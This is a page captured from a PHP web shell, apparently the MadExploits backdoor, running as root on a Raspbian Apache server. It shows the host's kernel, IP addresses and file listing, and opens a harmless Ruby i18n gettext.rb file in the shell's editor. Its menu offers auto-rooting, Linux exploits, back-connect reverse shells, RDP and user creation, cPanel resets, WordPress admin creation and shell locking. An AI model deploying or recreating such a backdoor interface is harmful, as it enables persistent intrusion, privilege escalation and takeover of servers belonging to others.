Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
i18n /
[ HOME SHELL ]
Name
Size
Permission
Action
backend
[ DIR ]
drwxr-xr-x
core_ext
[ DIR ]
drwxr-xr-x
gettext
[ DIR ]
drwxr-xr-x
interpolate
[ DIR ]
drwxr-xr-x
locale
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
backend.rb
998
B
-rw-r--r--
config.rb
5.53
KB
-rw-r--r--
exceptions.rb
2.58
KB
-rw-r--r--
gettext.rb
780
B
-rw-r--r--
locale.rb
157
B
-rw-r--r--
middleware.rb
236
B
-rw-r--r--
tests.rb
479
B
-rw-r--r--
version.rb
67
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gettext.rb
# frozen_string_literal: true module I18n module Gettext PLURAL_SEPARATOR = "\001" CONTEXT_SEPARATOR = "\004" autoload :Helpers, 'i18n/gettext/helpers' @@plural_keys = { :en => [:one, :other] } class << self # returns an array of plural keys for the given locale or the whole hash # of locale mappings to plural keys so that we can convert from gettext's # integer-index based style # TODO move this information to the pluralization module def plural_keys(*args) args.empty? ? @@plural_keys : @@plural_keys[args.first] || @@plural_keys[:en] end def extract_scope(msgid, separator) scope = msgid.to_s.split(separator) msgid = scope.pop [scope, msgid] end end end end
Close